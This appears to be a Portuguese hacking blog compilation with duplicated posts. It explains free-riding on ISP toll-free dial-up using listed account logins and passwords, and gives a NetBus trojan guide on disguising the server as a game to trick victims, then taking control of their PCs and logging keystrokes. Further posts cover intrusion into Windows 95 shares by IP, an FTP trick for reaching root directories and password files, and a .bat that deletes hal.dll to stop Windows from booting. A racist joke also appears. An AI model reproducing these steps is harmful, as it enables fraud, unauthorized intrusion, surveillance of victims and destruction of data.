Conexões 0800
Conexões 0800
1. Clique em meu computador e em seguida clique em acesso a rede dial-up clique em fazer nova conexão, ao abrir coloque o nome universo no campo "digite o nome do computador que você esta chamando e em seguida clique em avançar, no campo numero do telefone digite 0800158002 e clique em avançar e em concluir, apos isto vai aparecer um ícone com nome de universo, você deve dar um clique com o botão direito do mouse em cima desse ícone e selecionar propriedades, clique na guia tipos de servidor e desmarque as opções netBEUI e compativel com ipx/spx depois clique em configurações do tcp/ip marque a opção especificar um endereço de ip e no endereço endereço de ip digite 200.231.204.185 em seguida marque a opção especificar endereços do servidor de nomes, em dns primario digite o mesmo numero 200.231.204.185 como tambem deve digitar esse numero em dns secundario, wins primario e wins secundario apos isso clique em ok e vá para a guia geral, clique no botão configurar, vá para a guia opções e marque a opção exibir uma janela de terminal apos a discagem em seguida clique em ok e desmarque a opção usar codigo da cidade e propriedades de conexão em seguida ok, depois tente a conexão, na metade do precesso de conexão vai aparecer uma tela preta com o dos, nela você deve digitar o login e a senha do universo e pronto você esta conectado pela universo online 0800 sem pagar nada de pulsos
O Login do universo on line é "universo"
a senha do universo online é "online"
Terra
08002830303 clique em meu computador e em acesso a rede dial-up clique em qualquer conexão existente e altere o numero de telefone para 08002830303
o login do terra é "geovana.vieira.pits" a senha do terra é "70713740310"
AOL AOL clique em meu computador e em acesso a rede dial-up clique em qualquer conexão existente e altere o numero de telefone para 0800911083
o login do AOL é "JovinianoJ" a senha do AOL é "heart-herb"
IG IG clique em meu computador e em acesso a rede dial-up clique em qualquer conexão existente e altere o numero de telefone para 0800162634
o login do IG é "ig" a senha do IG é "ig"
1. Clique em meu computador e em seguida clique em acesso a rede dial-up clique em fazer nova conexão, ao abrir coloque o nome universo no campo "digite o nome do computador que você esta chamando e em seguida clique em avançar, no campo numero do telefone digite 0800158002 e clique em avançar e em concluir, apos isto vai aparecer um ícone com nome de universo, você deve dar um clique com o botão direito do mouse em cima desse ícone e selecionar propriedades, clique na guia tipos de servidor e desmarque as opções netBEUI e compativel com ipx/spx depois clique em configurações do tcp/ip marque a opção especificar um endereço de ip e no endereço endereço de ip digite 200.231.204.185 em seguida marque a opção especificar endereços do servidor de nomes, em dns primario digite o mesmo numero 200.231.204.185 como tambem deve digitar esse numero em dns secundario, wins primario e wins secundario apos isso clique em ok e vá para a guia geral, clique no botão configurar, vá para a guia opções e marque a opção exibir uma janela de terminal apos a discagem em seguida clique em ok e desmarque a opção usar codigo da cidade e propriedades de conexão em seguida ok, depois tente a conexão, na metade do precesso de conexão vai aparecer uma tela preta com o dos, nela você deve digitar o login e a senha do universo e pronto você esta conectado pela universo online 0800 sem pagar nada de pulsos
O Login do universo on line é "universo"
a senha do universo online é "online"
Terra
08002830303 clique em meu computador e em acesso a rede dial-up clique em qualquer conexão existente e altere o numero de telefone para 08002830303
o login do terra é "geovana.vieira.pits" a senha do terra é "70713740310"
AOL AOL clique em meu computador e em acesso a rede dial-up clique em qualquer conexão existente e altere o numero de telefone para 0800911083
o login do AOL é "JovinianoJ" a senha do AOL é "heart-herb"
IG IG clique em meu computador e em acesso a rede dial-up clique em qualquer conexão existente e altere o numero de telefone para 0800162634
o login do IG é "ig" a senha do IG é "ig"
baixando no youtube sem programa
Baixar os vídeos do YOUTUBE sem Programa
Qual programa eu uso para baixar os vídeos do YOUTUBE?A resposta é simples: Nenhum!
Explicarei o procedimento:•
Entre no site http://www.youtube.com/ e procure pelo vídeo do qual você deseja fazer o download!
Após encontrado o vídeo desejado, clique para abrir como se você fosse assisti-lo.
Depois de ter feito isso, vá até a barra de endereços:
Lá estará um link parecido com este:http://br.youtube.com/watch?v=D-Kfcq5KM9o•
Vá até a barra de endereços e apague a palavra " watch? " , apague também o sinal de igualdade " = " , no lugar do sinal de igualdade coloque " / " , ficará assim:http://br.youtube.com/v/D-Kfcq5KM9o•
Aperte enter, o vídeo ficará em uma tela inteira, após aparecer o vídeo na tela inteira, note que o link estará diferente, ex:http://br.youtube.com/swf/l.swf?video_id=D...hCSqVwd103kqfYV• Apague " swf/l.swf " e coloque " get_video " , ex:http://br.youtube.com/get_video?video_id=D...hCSqVwd103kqfYV•
Aperte enter e pronto, abrira a janela perguntando aonde você deseja salvar o arquivo.OBS.: APÓS TERMINAR O DOWNLOAD NÃO ABRA-O, RENOME-O, COLOQUE " . " E O
Qual programa eu uso para baixar os vídeos do YOUTUBE?A resposta é simples: Nenhum!
Explicarei o procedimento:•
Entre no site http://www.youtube.com/ e procure pelo vídeo do qual você deseja fazer o download!
Após encontrado o vídeo desejado, clique para abrir como se você fosse assisti-lo.
Depois de ter feito isso, vá até a barra de endereços:
Lá estará um link parecido com este:http://br.youtube.com/watch?v=D-Kfcq5KM9o•
Vá até a barra de endereços e apague a palavra " watch? " , apague também o sinal de igualdade " = " , no lugar do sinal de igualdade coloque " / " , ficará assim:http://br.youtube.com/v/D-Kfcq5KM9o•
Aperte enter, o vídeo ficará em uma tela inteira, após aparecer o vídeo na tela inteira, note que o link estará diferente, ex:http://br.youtube.com/swf/l.swf?video_id=D...hCSqVwd103kqfYV• Apague " swf/l.swf " e coloque " get_video " , ex:http://br.youtube.com/get_video?video_id=D...hCSqVwd103kqfYV•
Aperte enter e pronto, abrira a janela perguntando aonde você deseja salvar o arquivo.OBS.: APÓS TERMINAR O DOWNLOAD NÃO ABRA-O, RENOME-O, COLOQUE " . " E O
net bus
nET BUS
o Net Bus é um programa desenvolvido para fazer manutenção de micros a longa distância, mais que caiu em mãos erradas devido a sua facilidade de uso. Possui uma interface muito simples de boa visão, identificação e utilização.
Para podermos usar o Net Bus precisamos mandar um PATCH cliente à vitima, e ele sem saber, o instalará em seu computador liberando acesso total à você.
Quero deixa bem claro que quando alguma vitima instala o PATCH cliente em seu computador passa a dar acesso a todas as pessoas que possuem o Net Bus. Por Isso devemos colocar senha quando fazemos o primeiro acesso. Agora vamos ao que nos interessa.
Como Manda o PATCH cliente para a Vitima !
Para mandar um PATCH para a vitima, basta mandar um arquivo .EXE para ele com um nome de algum jogo ou programa e peça para a vitima o instalar. Outra opção seria criar um programa instalador que executa um comando instalado automaticamente patch cliente na maquina da vitima. Como exemplo de programa bem fácil de usar e o WinZip Self Extractor ( Zip algum arquivo e quando zipado clique com o botão direito do mouse e procure esse comando: WinZip Self Extractor e clique ). Dessa forma a vitima instalará o programa em seu PC sem saber que está instalando um TROJAM.
Depois de Instalado, Como Fazer a Conexão?!
Descubra o IP da vitima ( se ela estiver no mIRC digite: /dsn Nick e o IP dessa pessoas irá aparece na Janela de STATUS ). Pegue IP e coloque no local do NetBus onde está denominado "Host name/IP" e clique em "connect" para fazer a conexão com a maquina da vitima. Se aparecer lá em baixo a mensagem "Couldn't connect to ( o IP )" o programa não esta conseguindo fazer a conexão, verifique com a vitima se realmente ela instalou aquele programinha, para saber se a conexão foi feita, depois de aperta connect aparecerá o botão "cancel" caso apareça a conexão ta pronta.
COMANDOS:
OPEN CDROM
Abre/Fecha o cd-rom uma vez ou em intervalos ( Especifico ou segundos )
SHOW IMAGE
Espetáculo imagem opcional. se nenhum caminho cheio de imagem é determinado a procurar isto no Remendo-Diretório. Os imagem-formatos apoiados são BMP e JPG
SWAP MOUSE
inverte os botões do mouse da vitima
START PROGRAM
Começo Aplicação opcional.
PLAY SOUND
Jogo som-arquivo opcional. Se nenhum caminho cheio de som-arquivo é determinado que procurará isto no Remendo-diretório. O som-formato apoiado é WAV.
MOUSE POS
Especifique a coordenada do mouse nos dois quadrados e click em Mouse POS, e o mouse da vitima se posicionará.
CONTROL MOUSE
Seu mouse vira o dele, ou seja, tudo o que você fizer no seu mouse aparece no dele e ele perde totalmente o controle do mouse.
MSG MANAGER
Mostre um diálogo de mensagem na tela. A resposta sempre é mandada de volta a você.
EXIT WINDOWS
Paralisação do sistema, logoff e usuário e etc.
GO TO URL
Vá para a url opcional dentro da falta de rede-browser.
SEND TEXT
Envie letras do seu teclado a aplicação ativa no PC designado. O Texto no campo "Message/Text" será inserido na aplicação que tem enfoque. (" |" Representa Enter ). LISTEN => Tudo que a vitima esta digitando monitore com esta função.
SCREENDUMP
Adquira um Screendump ( Não deveria ser usado em conexões lentas ). Captura a tela que a vitima esta visualizando em GET.
INFO
Informações sobre o computador designado.
FILE MANAGER
UpLoad qualquer arquivo para o computador designado ( O Contrário de Download ). Com esta características e possível atualiza o PATCH remotamente com sua nova versão.
SOUND SYSTEM
Aumenta e Diminui o Som-Volume da Vitima.
RECORD SOUND
Sons de registro que captura de microfone. O som é mandado de volta a você.
FILE MANAGER
Carregue ou apague qualquer arquivo que você quiser. Você escolhe qual arquivo deseja você a fazer Donwload\Delete em uma versão que representa o HardDisk no objetivo. Tudo Que esta sendo utilizado.
KEY MANAGER
Chaves no teclado pode ser incapacitado.
SERVER SETUP
Administração de contra-senha-proteção.
ACTIVE WNDS
Mostre, mate e janelas de enfoque no sistema.
SCAN!
Ache servidores de netBus com o escanner de porto extremista-rápido.
TCP PORT
Redirecione dados em um TCP/port especificado para outro host e porta.
E-MAIL FROM
Redirecione aplicações de consolo I/O para um TCP-port especificando ( telnet o host a porta especificado para interagir com a aplicação).
SMTP SERVER
Configure o servidor-exe com opções como TCP-port e notificações de correio.
SERVER ADMIN
Possibilidade para restringir acesso só a alguns IP (mas esteja preparado para IP-spoofing)
NetBUS
O NetBus, é o que podemos chamar de trojan "cavalo de tróia" e age como um vírus, porém um vírus que ao invés de danificar arquivos de sua máquina e modificá-los, ele simplesmente instala um ambiente de serviço na máquina, tornando-a remotamente acessível.
Através do protocolo TCP/IP, o NetBus cria uma porta de conexões e fica esperando conexões nessa porta, para através dela dar acesso a quase todos os controles da máquina a quem o acessar, podendo ser feito inclusive um grande estrago no sistema, visto que é possível se fazer desde um simples download para a máquina até mesmo apagar arquivos importantes do sistema.
A máquina infectada fica com o NetBus Server cujo arquivo por default utiliza o nome de Patch.exe, já o cliente ou seja, a pessoa que irá acessar essa máquina remotamente e que provavelmente implantou o NetBus no sistema, utiliza o NetBus
Removendo o Netbus
Se vc estiver infectado com o netbus.....para remover eh muito simples....use o "localizar arquivos ou pastas" do windows e procure por SYSEDIT, se vc realmente estiver infectado com o netbus irá aparecer um arquivo cujo ícone eh um "parafuso"....delete esse arquivo !!!!!! Depois procure por um outro arquivo chamado KeyHook.dll, se encontrar
o Net Bus é um programa desenvolvido para fazer manutenção de micros a longa distância, mais que caiu em mãos erradas devido a sua facilidade de uso. Possui uma interface muito simples de boa visão, identificação e utilização.
Para podermos usar o Net Bus precisamos mandar um PATCH cliente à vitima, e ele sem saber, o instalará em seu computador liberando acesso total à você.
Quero deixa bem claro que quando alguma vitima instala o PATCH cliente em seu computador passa a dar acesso a todas as pessoas que possuem o Net Bus. Por Isso devemos colocar senha quando fazemos o primeiro acesso. Agora vamos ao que nos interessa.
Como Manda o PATCH cliente para a Vitima !
Para mandar um PATCH para a vitima, basta mandar um arquivo .EXE para ele com um nome de algum jogo ou programa e peça para a vitima o instalar. Outra opção seria criar um programa instalador que executa um comando instalado automaticamente patch cliente na maquina da vitima. Como exemplo de programa bem fácil de usar e o WinZip Self Extractor ( Zip algum arquivo e quando zipado clique com o botão direito do mouse e procure esse comando: WinZip Self Extractor e clique ). Dessa forma a vitima instalará o programa em seu PC sem saber que está instalando um TROJAM.
Depois de Instalado, Como Fazer a Conexão?!
Descubra o IP da vitima ( se ela estiver no mIRC digite: /dsn Nick e o IP dessa pessoas irá aparece na Janela de STATUS ). Pegue IP e coloque no local do NetBus onde está denominado "Host name/IP" e clique em "connect" para fazer a conexão com a maquina da vitima. Se aparecer lá em baixo a mensagem "Couldn't connect to ( o IP )" o programa não esta conseguindo fazer a conexão, verifique com a vitima se realmente ela instalou aquele programinha, para saber se a conexão foi feita, depois de aperta connect aparecerá o botão "cancel" caso apareça a conexão ta pronta.
COMANDOS:
OPEN CDROM
Abre/Fecha o cd-rom uma vez ou em intervalos ( Especifico ou segundos )
SHOW IMAGE
Espetáculo imagem opcional. se nenhum caminho cheio de imagem é determinado a procurar isto no Remendo-Diretório. Os imagem-formatos apoiados são BMP e JPG
SWAP MOUSE
inverte os botões do mouse da vitima
START PROGRAM
Começo Aplicação opcional.
PLAY SOUND
Jogo som-arquivo opcional. Se nenhum caminho cheio de som-arquivo é determinado que procurará isto no Remendo-diretório. O som-formato apoiado é WAV.
MOUSE POS
Especifique a coordenada do mouse nos dois quadrados e click em Mouse POS, e o mouse da vitima se posicionará.
CONTROL MOUSE
Seu mouse vira o dele, ou seja, tudo o que você fizer no seu mouse aparece no dele e ele perde totalmente o controle do mouse.
MSG MANAGER
Mostre um diálogo de mensagem na tela. A resposta sempre é mandada de volta a você.
EXIT WINDOWS
Paralisação do sistema, logoff e usuário e etc.
GO TO URL
Vá para a url opcional dentro da falta de rede-browser.
SEND TEXT
Envie letras do seu teclado a aplicação ativa no PC designado. O Texto no campo "Message/Text" será inserido na aplicação que tem enfoque. (" |" Representa Enter ). LISTEN => Tudo que a vitima esta digitando monitore com esta função.
SCREENDUMP
Adquira um Screendump ( Não deveria ser usado em conexões lentas ). Captura a tela que a vitima esta visualizando em GET.
INFO
Informações sobre o computador designado.
FILE MANAGER
UpLoad qualquer arquivo para o computador designado ( O Contrário de Download ). Com esta características e possível atualiza o PATCH remotamente com sua nova versão.
SOUND SYSTEM
Aumenta e Diminui o Som-Volume da Vitima.
RECORD SOUND
Sons de registro que captura de microfone. O som é mandado de volta a você.
FILE MANAGER
Carregue ou apague qualquer arquivo que você quiser. Você escolhe qual arquivo deseja você a fazer Donwload\Delete em uma versão que representa o HardDisk no objetivo. Tudo Que esta sendo utilizado.
KEY MANAGER
Chaves no teclado pode ser incapacitado.
SERVER SETUP
Administração de contra-senha-proteção.
ACTIVE WNDS
Mostre, mate e janelas de enfoque no sistema.
SCAN!
Ache servidores de netBus com o escanner de porto extremista-rápido.
TCP PORT
Redirecione dados em um TCP/port especificado para outro host e porta.
E-MAIL FROM
Redirecione aplicações de consolo I/O para um TCP-port especificando ( telnet o host a porta especificado para interagir com a aplicação).
SMTP SERVER
Configure o servidor-exe com opções como TCP-port e notificações de correio.
SERVER ADMIN
Possibilidade para restringir acesso só a alguns IP (mas esteja preparado para IP-spoofing)
NetBUS
O NetBus, é o que podemos chamar de trojan "cavalo de tróia" e age como um vírus, porém um vírus que ao invés de danificar arquivos de sua máquina e modificá-los, ele simplesmente instala um ambiente de serviço na máquina, tornando-a remotamente acessível.
Através do protocolo TCP/IP, o NetBus cria uma porta de conexões e fica esperando conexões nessa porta, para através dela dar acesso a quase todos os controles da máquina a quem o acessar, podendo ser feito inclusive um grande estrago no sistema, visto que é possível se fazer desde um simples download para a máquina até mesmo apagar arquivos importantes do sistema.
A máquina infectada fica com o NetBus Server cujo arquivo por default utiliza o nome de Patch.exe, já o cliente ou seja, a pessoa que irá acessar essa máquina remotamente e que provavelmente implantou o NetBus no sistema, utiliza o NetBus
Removendo o Netbus
Se vc estiver infectado com o netbus.....para remover eh muito simples....use o "localizar arquivos ou pastas" do windows e procure por SYSEDIT, se vc realmente estiver infectado com o netbus irá aparecer um arquivo cujo ícone eh um "parafuso"....delete esse arquivo !!!!!! Depois procure por um outro arquivo chamado KeyHook.dll, se encontrar
Invadindo o Windows 95
#
Devido a um enorme número de Bugs, e uma capacidade de proteção que permite que qualquer pessoa invada um micro que utilize a rede Dial Up com uma conexão PPP, o Windows é um dos maiores motivos de piadas entre os portugueses, negros e o Rubinho Barriquelo. Mesmo que vc não esteja utilizando o compartilhamento de arquivos, qualquer pessoa pode invadir seu computador se vc estiver utilizando esse tipo de conexão.
Para esta "receita de bolo" funcionar, vc tem que estar usando a rede Dial Up e uma conexão PPP. Antes de tudo verifique se vc possui os drivers de clientes da microsof. Caso não estejam instalados, instale-os através do painel de controle no ícone redes. Verifique tb, se o compartilhamento de arquivos e impressoras está instalado
Configurar essas opçõesé simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontraráa opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS,você precisa criar um arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e osnomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis,tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você aindapoderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador.
Invadindo pela porta 666
Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa.
Invadindo pelo IP da vitíma
A invasão pôr IP pode ser feita de varias maneiras, aqui vai um jeito fácil de invadir sem ter q ficar fazendo mil coisas. Aqui vc aprenderá um meio de invadir pôr IP que só é garantido se vc e a pessoa a ser invadida estiverem o com o compartilhamento de dados ligado, e estiver entrando pela rede dial-up com a rede microsoft instalada.
Se vc não esta com a rede microsoft instalada e não sabe invadir, ai vai: Primeiro vá em meu computador, painel de controle, rede. Quando vc entrar na rede vai abrir uma caixa de comandos, veja lá se a rede microsoft esta instalada, se estiver instalada vá em logon principal da rede e escolha cliente para a rede microsoft , caso não esteja instalada, va em adicionar, na caixa va em cliente, depois em microsoft e escolha cliente p/ rede microsoft. Caso vc não ache esses nomes va em com disco precure lá.
Depois de instalado volte para o meu computador, vá acesso a rede dial-up e clique com o botão direito na conexão q vc faz. La vá em propiedades, tipo do servidor, configuração TCP/IP, e especificar o IP. Lá vc poe o Ip do cara q vc vai invadir. Dai é só reconectar, ir em explorando do
Devido a um enorme número de Bugs, e uma capacidade de proteção que permite que qualquer pessoa invada um micro que utilize a rede Dial Up com uma conexão PPP, o Windows é um dos maiores motivos de piadas entre os portugueses, negros e o Rubinho Barriquelo. Mesmo que vc não esteja utilizando o compartilhamento de arquivos, qualquer pessoa pode invadir seu computador se vc estiver utilizando esse tipo de conexão.
Para esta "receita de bolo" funcionar, vc tem que estar usando a rede Dial Up e uma conexão PPP. Antes de tudo verifique se vc possui os drivers de clientes da microsof. Caso não estejam instalados, instale-os através do painel de controle no ícone redes. Verifique tb, se o compartilhamento de arquivos e impressoras está instalado
Configurar essas opçõesé simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontraráa opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS,você precisa criar um arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e osnomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis,tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você aindapoderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador.
Invadindo pela porta 666
Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa.
Invadindo pelo IP da vitíma
A invasão pôr IP pode ser feita de varias maneiras, aqui vai um jeito fácil de invadir sem ter q ficar fazendo mil coisas. Aqui vc aprenderá um meio de invadir pôr IP que só é garantido se vc e a pessoa a ser invadida estiverem o com o compartilhamento de dados ligado, e estiver entrando pela rede dial-up com a rede microsoft instalada.
Se vc não esta com a rede microsoft instalada e não sabe invadir, ai vai: Primeiro vá em meu computador, painel de controle, rede. Quando vc entrar na rede vai abrir uma caixa de comandos, veja lá se a rede microsoft esta instalada, se estiver instalada vá em logon principal da rede e escolha cliente para a rede microsoft , caso não esteja instalada, va em adicionar, na caixa va em cliente, depois em microsoft e escolha cliente p/ rede microsoft. Caso vc não ache esses nomes va em com disco precure lá.
Depois de instalado volte para o meu computador, vá acesso a rede dial-up e clique com o botão direito na conexão q vc faz. La vá em propiedades, tipo do servidor, configuração TCP/IP, e especificar o IP. Lá vc poe o Ip do cara q vc vai invadir. Dai é só reconectar, ir em explorando do
invadir site ftp
1. passo Vá ao DOS e digite FTP , ao aparece o prompt ftp, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP , ex.: (to) ftp.convex.com.br. Ao conectar ele pedira a senha e o Password, nao entre com seu email nem com a sua senha se estiver hackeando o seu provedor!!(NUNCA DIGITE NADA NO USERS E NO PASSWORDS)
2. passo No login precione ENTER, no password precione Novamente... Irá aparecer o prompt ftp, novamente..., ai é só digitar : quote user ftp , precione ENTER e digite: quote cwd ~root Precione ENTER novamente e digite: quote pass ftp Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....
3. passo Após ENTRAR!!!!!! Ao entrar vc vai estar no Diretorio do login, Ex.: \home\root\ Para ver a lista de users vc volta um dir vá para o dir \home\ e cada dir éum usuario,... tente pegar as senhas ,mais pegando as senhas a um porem ela sao todas cryptografadas, mais nao tem problema nenhum mande elas para min que eu descrypto elas ou pegue vc mesmo um descrypto e blZ !!! Para saber os comandos do prog FTP digite: ?
2. passo No login precione ENTER, no password precione Novamente... Irá aparecer o prompt ftp, novamente..., ai é só digitar : quote user ftp , precione ENTER e digite: quote cwd ~root Precione ENTER novamente e digite: quote pass ftp Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....
3. passo Após ENTRAR!!!!!! Ao entrar vc vai estar no Diretorio do login, Ex.: \home\root\ Para ver a lista de users vc volta um dir vá para o dir \home\ e cada dir éum usuario,... tente pegar as senhas ,mais pegando as senhas a um porem ela sao todas cryptografadas, mais nao tem problema nenhum mande elas para min que eu descrypto elas ou pegue vc mesmo um descrypto e blZ !!! Para saber os comandos do prog FTP digite: ?
Virus boot windows
Virus boot windows
abra o bloco de notas ou (outro preferido )e digite
delete C:\WINDOWS\system32/hal.dll
Salva com a extensão .bat
pronto se quizer converteuse o converto do site ajudahacker.br30.com
ou baixe o bat strene
tutorial feito pelo ryary
by ryary
abra o bloco de notas ou (outro preferido )e digite
delete C:\WINDOWS\system32/hal.dll
Salva com a extensão .bat
pronto se quizer converteuse o converto do site ajudahacker.br30.com
ou baixe o bat strene
tutorial feito pelo ryary
by ryary
Assinar:
Postagens (Atom)